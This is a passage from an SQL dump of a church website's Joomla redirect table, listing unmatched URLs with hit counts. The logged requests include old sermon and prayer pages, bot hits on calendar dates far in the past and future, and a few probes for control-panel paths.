(749, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/29/-', NULL, '', '', 1, 0, '2017-01-06 01:22:00', '0000-00-00 00:00:00', 301),
(750, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/16/-', NULL, '', '', 1, 0, '2017-01-06 01:22:06', '0000-00-00 00:00:00', 301),
(751, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/28/-', NULL, '', '', 1, 0, '2017-01-06 01:22:12', '0000-00-00 00:00:00', 301),
(752, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/16/-', NULL, '', '', 1, 0, '2017-01-06 01:22:18', '0000-00-00 00:00:00', 301),
(753, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/7/-', NULL, '', '', 1, 0, '2017-01-06 01:22:23', '0000-00-00 00:00:00', 301),
(754, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/29/-', NULL, '', '', 1, 0, '2017-01-06 01:22:29', '0000-00-00 00:00:00', 301),
(755, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 4, 0, '2017-01-06 01:25:33', '0000-00-00 00:00:00', 301),
(756, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/12/-', NULL, '', '', 1, 0, '2017-01-06 01:28:52', '0000-00-00 00:00:00', 301),
(757, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/18/-', NULL, '', '', 1, 0, '2017-01-06 01:32:39', '0000-00-00 00:00:00', 301),
(758, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/22/-', NULL, '', '', 1, 0, '2017-01-06 01:36:26', '0000-00-00 00:00:00', 301),
(759, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/25/-', NULL, '', '', 1, 0, '2017-01-06 01:40:13', '0000-00-00 00:00:00', 301),
(760, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/26/-', NULL, '', '', 1, 0, '2017-01-06 01:44:00', '0000-00-00 00:00:00', 301),
(761, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/8/-', NULL, '', '', 1, 0, '2017-01-06 01:47:47', '0000-00-00 00:00:00', 301),
(762, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/4/-', NULL, '', '', 1, 0, '2017-01-06 01:51:34', '0000-00-00 00:00:00', 301),
(763, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/14/-', NULL, '', '', 1, 0, '2017-01-06 01:55:21', '0000-00-00 00:00:00', 301),
(764, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/6/-', NULL, '', '', 1, 0, '2017-01-06 01:59:08', '0000-00-00 00:00:00', 301),
(765, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/15/-', NULL, '', '', 1, 0, '2017-01-06 02:02:55', '0000-00-00 00:00:00', 301),
(766, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/28/-', NULL, '', '', 1, 0, '2017-01-06 02:06:42', '0000-00-00 00:00:00', 301),
(767, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/14/-', NULL, '', '', 1, 0, '2017-01-06 02:10:29', '0000-00-00 00:00:00', 301),
(768, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/27/-', NULL, '', '', 1, 0, '2017-01-06 02:18:03', '0000-00-00 00:00:00', 301),
(769, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/27/-', NULL, '', '', 1, 0, '2017-01-06 02:21:50', '0000-00-00 00:00:00', 301),
(770, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1948/9/-', NULL, '', '', 1, 0, '2017-01-06 02:25:37', '0000-00-00 00:00:00', 301),
(771, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/WordPress', NULL, '', '', 1, 0, '2017-01-06 03:50:27', '0000-00-00 00:00:00', 301),
(772, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/29/15', NULL, '', '', 2, 0, '2017-01-06 04:45:15', '0000-00-00 00:00:00', 301),
(773, 'http://www.lifeoasisinternationalchurch.org/gobc2015', NULL, '', '', 73, 0, '2017-01-06 05:12:36', '0000-00-00 00:00:00', 301),
(774, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/17-sample-content-6', NULL, '', '', 12, 0, '2017-01-06 05:42:20', '0000-00-00 00:00:00', 301),
(775, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/19', NULL, '', '', 5, 0, '2017-01-06 06:23:17', '0000-00-00 00:00:00', 301),
(776, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/sermons', NULL, '', '', 13, 0, '2017-01-06 07:24:47', '0000-00-00 00:00:00', 301),
(777, 'http://lifeoasisinternationalchurch.org/bibleSchool.html', NULL, '', '', 1, 0, '2017-01-06 08:06:22', '0000-00-00 00:00:00', 301),
(778, 'http://lifeoasisinternationalchurch.org/message/message.html', NULL, '', '', 1, 0, '2017-01-06 09:04:58', '0000-00-00 00:00:00', 301),
(779, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/5/-', NULL, '', '', 1, 0, '2017-01-06 09:48:02', '0000-00-00 00:00:00', 301),
(780, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/23/-', NULL, '', '', 1, 0, '2017-01-06 09:48:13', '0000-00-00 00:00:00', 301),
(781, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/15/-', NULL, '', '', 1, 0, '2017-01-06 09:48:19', '0000-00-00 00:00:00', 301),
(782, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/12/-', NULL, '', '', 1, 0, '2017-01-06 09:48:25', '0000-00-00 00:00:00', 301),
(783, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/17/-', NULL, '', '', 1, 0, '2017-01-06 09:48:31', '0000-00-00 00:00:00', 301),
(784, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/25/-', NULL, '', '', 1, 0, '2017-01-06 09:48:37', '0000-00-00 00:00:00', 301),
(785, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/5/-', NULL, '', '', 1, 0, '2017-01-06 09:48:43', '0000-00-00 00:00:00', 301),
(786, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/13/-', NULL, '', '', 1, 0, '2017-01-06 09:48:49', '0000-00-00 00:00:00', 301),
(787, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/5/-', NULL, '', '', 1, 0, '2017-01-06 09:49:14', '0000-00-00 00:00:00', 301),
(788, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/10/-', NULL, '', '', 1, 0, '2017-01-06 09:49:25', '0000-00-00 00:00:00', 301),
(789, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2096/11/-', NULL, '', '', 1, 0, '2017-01-06 09:49:32', '0000-00-00 00:00:00', 301),
(790, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1946/10/-', NULL, '', '', 1, 0, '2017-01-06 09:49:38', '0000-00-00 00:00:00', 301),
(791, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2097/6/-', NULL, '', '', 1, 0, '2017-01-06 09:50:17', '0000-00-00 00:00:00', 301),
(792, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/18/-', NULL, '', '', 1, 0, '2017-01-06 09:50:26', '0000-00-00 00:00:00', 301),
(793, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2097/11/-', NULL, '', '', 1, 0, '2017-01-06 09:50:32', '0000-00-00 00:00:00', 301),
(794, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/7/-', NULL, '', '', 1, 0, '2017-01-06 09:50:38', '0000-00-00 00:00:00', 301),
(795, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1946/11/-', NULL, '', '', 1, 0, '2017-01-06 09:50:57', '0000-00-00 00:00:00', 301),
(796, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2096/8/-', NULL, '', '', 1, 0, '2017-01-06 09:51:02', '0000-00-00 00:00:00', 301),
(797, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/14/-', NULL, '', '', 1, 0, '2017-01-06 09:51:08', '0000-00-00 00:00:00', 301),
(798, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/10/-', NULL, '', '', 1, 0, '2017-01-06 09:51:26', '0000-00-00 00:00:00', 301),
(799, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/7/13/-', NULL, '', '', 1, 0, '2017-01-06 09:51:32', '0000-00-00 00:00:00', 301),
(800, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/11/-', NULL, '', '', 1, 0, '2017-01-06 09:51:38', '0000-00-00 00:00:00', 301),
(801, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2098/11/-', NULL, '', '', 1, 0, '2017-01-06 09:51:56', '0000-00-00 00:00:00', 301),
(802, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/8/-', NULL, '', '', 1, 0, '2017-01-06 09:52:14', '0000-00-00 00:00:00', 301),
(803, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2095/10/-', NULL, '', '', 1, 0, '2017-01-06 09:52:20', '0000-00-00 00:00:00', 301),
(804, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/4/-', NULL, '', '', 1, 0, '2017-01-06 09:52:26', '0000-00-00 00:00:00', 301),
(805, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/11/-', NULL, '', '', 1, 0, '2017-01-06 09:52:33', '0000-00-00 00:00:00', 301),
(806, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/12/4/-', NULL, '', '', 1, 0, '2017-01-06 09:52:39', '0000-00-00 00:00:00', 301),
(807, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/6/6/-', NULL, '', '', 1, 0, '2017-01-06 09:52:45', '0000-00-00 00:00:00', 301),
(808, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/10/-', NULL, '', '', 1, 0, '2017-01-06 09:52:52', '0000-00-00 00:00:00', 301),
(809, 'http://www.lifeoasisinternationalchurch.org/component/content/category/18-loic', NULL, '', '', 36, 0, '2017-01-06 09:59:44', '0000-00-00 00:00:00', 301),
(810, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 5, 0, '2017-01-06 10:51:05', '0000-00-00 00:00:00', 301),
(811, 'http://www.lifeoasisinternationalchurch.org/47-prayer-a-fasting-day-38', NULL, '', '', 3, 0, '2017-01-06 11:04:02', '0000-00-00 00:00:00', 301),
(812, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/20-army-of-the-lord-3', NULL, '', '', 4, 0, '2017-01-06 11:16:46', '0000-00-00 00:00:00', 301),
(813, 'http://lifeoasisinternationalchurch.org/index.php/124-focus40-3', NULL, '', '', 1, 0, '2017-01-06 11:58:30', '0000-00-00 00:00:00', 301),
(814, 'http://lifeoasisinternationalchurch.org/index.php/156-day-29', NULL, '', '', 1, 0, '2017-01-06 12:54:10', '0000-00-00 00:00:00', 301),
(815, 'http://lifeoasisinternationalchurch.org/ministries/musci', NULL, '', '', 51, 0, '2017-01-06 13:16:48', '0000-00-00 00:00:00', 301),
(816, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 9, 0, '2017-01-06 13:16:48', '0000-00-00 00:00:00', 301),
(817, 'http://lifeoasisinternationalchurch.org/157-focus32-4', NULL, '', '', 4, 0, '2017-01-06 13:17:31', '0000-00-00 00:00:00', 301),
(818, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 13, 0, '2017-01-06 13:17:32', '0000-00-00 00:00:00', 301),
(819, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/20-prayer-a-fasting-day-12', NULL, '', '', 4, 0, '2017-01-06 13:17:32', '0000-00-00 00:00:00', 301),
(820, 'http://lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 34, 0, '2017-01-06 13:17:35', '0000-00-00 00:00:00', 301),
(821, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons?sermon_cat=21', NULL, '', '', 31, 0, '2017-01-06 13:33:53', '0000-00-00 00:00:00', 301),
(822, 'http://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/50-young-achievers', NULL, '', '', 27, 0, '2017-01-06 13:34:39', '0000-00-00 00:00:00', 301),
(823, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads', NULL, '', '', 1, 0, '2017-01-06 13:41:10', '0000-00-00 00:00:00', 301),
(824, 'http://www.lifeoasisinternationalchurch.org/li', NULL, '', '', 3, 0, '2017-01-06 15:13:02', '0000-00-00 00:00:00', 301),
(825, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/arrowthemes', NULL, '', '', 1, 0, '2017-01-06 15:21:38', '0000-00-00 00:00:00', 301),
(826, 'http://lifeoasisinternationalchurch.org/dispatcher/getSiteName.php', NULL, '', '', 1, 0, '2017-01-06 15:54:18', '0000-00-00 00:00:00', 301),
(827, 'http://lifeoasisinternationalchurch.org/WBXService/XMLService', NULL, '', '', 1, 0, '2017-01-06 15:54:20', '0000-00-00 00:00:00', 301),
(828, 'http://lifeoasisinternationalchurch.org/cp.php', NULL, '', '', 2, 0, '2017-01-06 17:14:17', '0000-00-00 00:00:00', 301),
(829, 'http://lifeoasisinternationalchurch.org/c.php', NULL, '', '', 2, 0, '2017-01-06 17:14:18', '0000-00-00 00:00:00', 301),
(830, 'http://lifeoasisinternationalchurch.org/cpanel.php', NULL, '', '', 2, 0, '2017-01-06 17:14:19', '0000-00-00 00:00:00', 301),
(831, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/44-prayer-a-fasting-day-35', NULL, '', '', 3, 0, '2017-01-06 17:16:05', '0000-00-00 00:00:00', 301),
(832, 'http://lifeoasisinternationalchurch.org/loicforum/', NULL, 'http://lifeoasisinternationalchurch.org/loicforum/', '', 40, 0, '2017-01-06 18:09:53', '0000-00-00 00:00:00', 301),
(833, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-news/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-06 19:16:02', '0000-00-00 00:00:00', 301),
(834, 'http://ljmti.lifeoasisinternationalchurch.org/resources/iradio', NULL, '', '', 1, 0, '2017-01-06 20:56:31', '0000-00-00 00:00:00', 301),
(835, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 5, 0, '2017-01-06 21:32:46', '0000-00-00 00:00:00', 301),
(836, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/3/-', NULL, '', '', 1, 0, '2017-01-06 21:52:57', '0000-00-00 00:00:00', 301),
(837, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/29/-', NULL, '', '', 1, 0, '2017-01-06 21:53:04', '0000-00-00 00:00:00', 301),
(838, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2099/6/-', NULL, '', '', 1, 0, '2017-01-06 21:53:32', '0000-00-00 00:00:00', 301),
(839, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/12/-', NULL, '', '', 1, 0, '2017-01-06 21:53:47', '0000-00-00 00:00:00', 301),
(840, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/4/-', NULL, '', '', 1, 0, '2017-01-06 21:53:54', '0000-00-00 00:00:00', 301),
(841, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1943/9/-', NULL, '', '', 1, 0, '2017-01-06 21:54:01', '0000-00-00 00:00:00', 301),
(842, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/31/-', NULL, '', '', 1, 0, '2017-01-06 21:54:08', '0000-00-00 00:00:00', 301),
(843, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/5/-', NULL, '', '', 1, 0, '2017-01-06 21:54:15', '0000-00-00 00:00:00', 301),
(844, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/4/-', NULL, '', '', 1, 0, '2017-01-06 21:54:36', '0000-00-00 00:00:00', 301),
(845, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/22/-', NULL, '', '', 1, 0, '2017-01-06 21:54:44', '0000-00-00 00:00:00', 301),
(846, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2098/8/-', NULL, '', '', 1, 0, '2017-01-06 21:54:51', '0000-00-00 00:00:00', 301),
(847, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/8/-', NULL, '', '', 1, 0, '2017-01-06 21:55:12', '0000-00-00 00:00:00', 301),
(848, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1943/11/-', NULL, '', '', 1, 0, '2017-01-06 21:55:48', '0000-00-00 00:00:00', 301),
(849, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/11/-', NULL, '', '', 1, 0, '2017-01-06 21:55:55', '0000-00-00 00:00:00', 301),
(850, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/10/17/-', NULL, '', '', 1, 0, '2017-01-06 21:56:02', '0000-00-00 00:00:00', 301),
(851, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/1/-', NULL, '', '', 1, 0, '2017-01-06 21:56:09', '0000-00-00 00:00:00', 301),
(852, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2099/9/-', NULL, '', '', 1, 0, '2017-01-06 21:56:24', '0000-00-00 00:00:00', 301),
(853, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/5/-', NULL, '', '', 1, 0, '2017-01-06 21:56:38', '0000-00-00 00:00:00', 301),
(854, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/7/-', NULL, '', '', 1, 0, '2017-01-06 21:56:45', '0000-00-00 00:00:00', 301),
(855, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2099/8/-', NULL, '', '', 1, 0, '2017-01-06 21:56:52', '0000-00-00 00:00:00', 301),
(856, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/12/-', NULL, '', '', 1, 0, '2017-01-06 21:56:59', '0000-00-00 00:00:00', 301),
(857, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/20/-', NULL, '', '', 1, 0, '2017-01-06 21:57:06', '0000-00-00 00:00:00', 301),
(858, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/4/2/-', NULL, '', '', 1, 0, '2017-01-06 21:57:14', '0000-00-00 00:00:00', 301),
(859, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/14/-', NULL, '', '', 1, 0, '2017-01-06 21:57:21', '0000-00-00 00:00:00', 301),
(860, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/21/-', NULL, '', '', 1, 0, '2017-01-06 21:57:28', '0000-00-00 00:00:00', 301),
(861, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/25/-', NULL, '', '', 1, 0, '2017-01-06 21:57:36', '0000-00-00 00:00:00', 301),
(862, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/9/-', NULL, '', '', 1, 0, '2017-01-06 21:57:43', '0000-00-00 00:00:00', 301),
(863, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2029/7/8/-', NULL, '', '', 1, 0, '2017-01-06 21:57:52', '0000-00-00 00:00:00', 301),
(864, 'http://www.lifeoasisinternationalchurch.org/index.php/166-day-38', NULL, '', '', 6, 0, '2017-01-06 22:24:06', '0000-00-00 00:00:00', 301),
(865, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4/', NULL, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4/', '', 1, 0, '2017-01-07 00:41:05', '0000-00-00 00:00:00', 301),
(866, 'http://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 8, 0, '2017-01-07 02:05:00', '0000-00-00 00:00:00', 301),
(867, 'http://www.lifeoasisinternationalchurch.org/about-us/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-07 03:32:16', '0000-00-00 00:00:00', 301),
(868, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/26/-', NULL, '', '', 1, 0, '2017-01-07 04:48:12', '0000-00-00 00:00:00', 301),
(869, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/10/-', NULL, '', '', 1, 0, '2017-01-07 04:48:20', '0000-00-00 00:00:00', 301),
(870, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1943/8/-', NULL, '', '', 1, 0, '2017-01-07 04:48:29', '0000-00-00 00:00:00', 301),
(871, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/4/-', NULL, '', '', 1, 0, '2017-01-07 04:48:38', '0000-00-00 00:00:00', 301),
(872, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1943/12/-', NULL, '', '', 1, 0, '2017-01-07 04:48:47', '0000-00-00 00:00:00', 301),
(873, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/12/-', NULL, '', '', 1, 0, '2017-01-07 04:49:05', '0000-00-00 00:00:00', 301),
(874, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/15/-', NULL, '', '', 1, 0, '2017-01-07 04:49:49', '0000-00-00 00:00:00', 301),
(875, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1942/11/-', NULL, '', '', 1, 0, '2017-01-07 04:49:58', '0000-00-00 00:00:00', 301),
(876, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/3/25/-', NULL, '', '', 1, 0, '2017-01-07 04:50:07', '0000-00-00 00:00:00', 301),
(877, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1941/10/-', NULL, '', '', 1, 0, '2017-01-07 04:50:16', '0000-00-00 00:00:00', 301),
(878, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/10/-', NULL, '', '', 1, 0, '2017-01-07 04:50:25', '0000-00-00 00:00:00', 301),
(879, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1942/8/-', NULL, '', '', 1, 0, '2017-01-07 04:50:33', '0000-00-00 00:00:00', 301),
(880, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/2100/8/-', NULL, '', '', 1, 0, '2017-01-07 04:50:42', '0000-00-00 00:00:00', 301),
(881, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/9/27/-', NULL, '', '', 1, 0, '2017-01-07 04:50:51', '0000-00-00 00:00:00', 301),
(882, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/21/-', NULL, '', '', 1, 0, '2017-01-07 04:51:00', '0000-00-00 00:00:00', 301),
(883, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/26/-', NULL, '', '', 1, 0, '2017-01-07 04:51:09', '0000-00-00 00:00:00', 301),
(884, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/29/-', NULL, '', '', 1, 0, '2017-01-07 04:51:27', '0000-00-00 00:00:00', 301),
(885, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/1/-', NULL, '', '', 1, 0, '2017-01-07 04:51:36', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(886, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/2/-', NULL, '', '', 1, 0, '2017-01-07 04:51:45', '0000-00-00 00:00:00', 301),
(887, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1940/10/-', NULL, '', '', 1, 0, '2017-01-07 04:51:53', '0000-00-00 00:00:00', 301),
(888, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2003/11/12/-', NULL, '', '', 1, 0, '2017-01-07 04:52:11', '0000-00-00 00:00:00', 301),
(889, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1946/2/-', NULL, '', '', 1, 0, '2017-01-07 04:52:33', '0000-00-00 00:00:00', 301),
(890, 'http://lifeoasisinternationalchurch.org/index.php/147-day-20', NULL, '', '', 1, 0, '2017-01-07 08:20:19', '0000-00-00 00:00:00', 301),
(891, 'http://www.lifeoasisinternationalchurch.org/10-prayer-a-fasting-day-1', NULL, '', '', 2, 0, '2017-01-07 12:43:56', '0000-00-00 00:00:00', 301),
(892, 'http://lifeoasisinternationalchurch.org/64-day-12', NULL, '', '', 2, 0, '2017-01-07 13:54:48', '0000-00-00 00:00:00', 301),
(893, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 14, 0, '2017-01-07 13:57:18', '0000-00-00 00:00:00', 301),
(894, 'http://lifeoasisinternationalchurch.org/about-us/the-church/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-07 14:10:57', '0000-00-00 00:00:00', 301),
(895, 'http://lifeoasisinternationalchurch.org/featured-messages', NULL, '', '', 56, 0, '2017-01-07 14:10:58', '0000-00-00 00:00:00', 301),
(896, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/19-prayer-a-fasting-day-11', NULL, '', '', 10, 0, '2017-01-07 14:10:58', '0000-00-00 00:00:00', 301),
(897, 'http://lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=52&Itemid=294', NULL, '', '', 3, 0, '2017-01-07 14:10:58', '0000-00-00 00:00:00', 301),
(898, 'http://lifeoasisinternationalchurch.org/about-us/our-belief/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-07 14:15:33', '0000-00-00 00:00:00', 301),
(899, 'http://lifeoasisinternationalchurch.org/ministries/mimmp', NULL, '', '', 41, 0, '2017-01-07 14:15:33', '0000-00-00 00:00:00', 301),
(900, 'http://www.lifeoasisinternationalchurch.org/resources/dod', NULL, '', '', 35, 0, '2017-01-07 14:51:37', '0000-00-00 00:00:00', 301),
(901, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/8/2/-', NULL, '', '', 1, 0, '2017-01-07 17:23:35', '0000-00-00 00:00:00', 301),
(902, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2027/6/23/-', NULL, '', '', 1, 0, '2017-01-07 17:42:30', '0000-00-00 00:00:00', 301),
(903, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/15/-', NULL, '', '', 1, 0, '2017-01-07 17:57:38', '0000-00-00 00:00:00', 301),
(904, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1945/3/-', NULL, '', '', 1, 0, '2017-01-07 18:12:46', '0000-00-00 00:00:00', 301),
(905, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/19/-', NULL, '', '', 1, 0, '2017-01-07 18:31:41', '0000-00-00 00:00:00', 301),
(906, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/1/5/-', NULL, '', '', 1, 0, '2017-01-07 18:35:28', '0000-00-00 00:00:00', 301),
(907, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1944/2/-', NULL, '', '', 1, 0, '2017-01-07 18:39:15', '0000-00-00 00:00:00', 301),
(908, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1939/10/-', NULL, '', '', 1, 0, '2017-01-07 18:43:02', '0000-00-00 00:00:00', 301),
(909, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/8/-', NULL, '', '', 1, 0, '2017-01-07 18:46:49', '0000-00-00 00:00:00', 301),
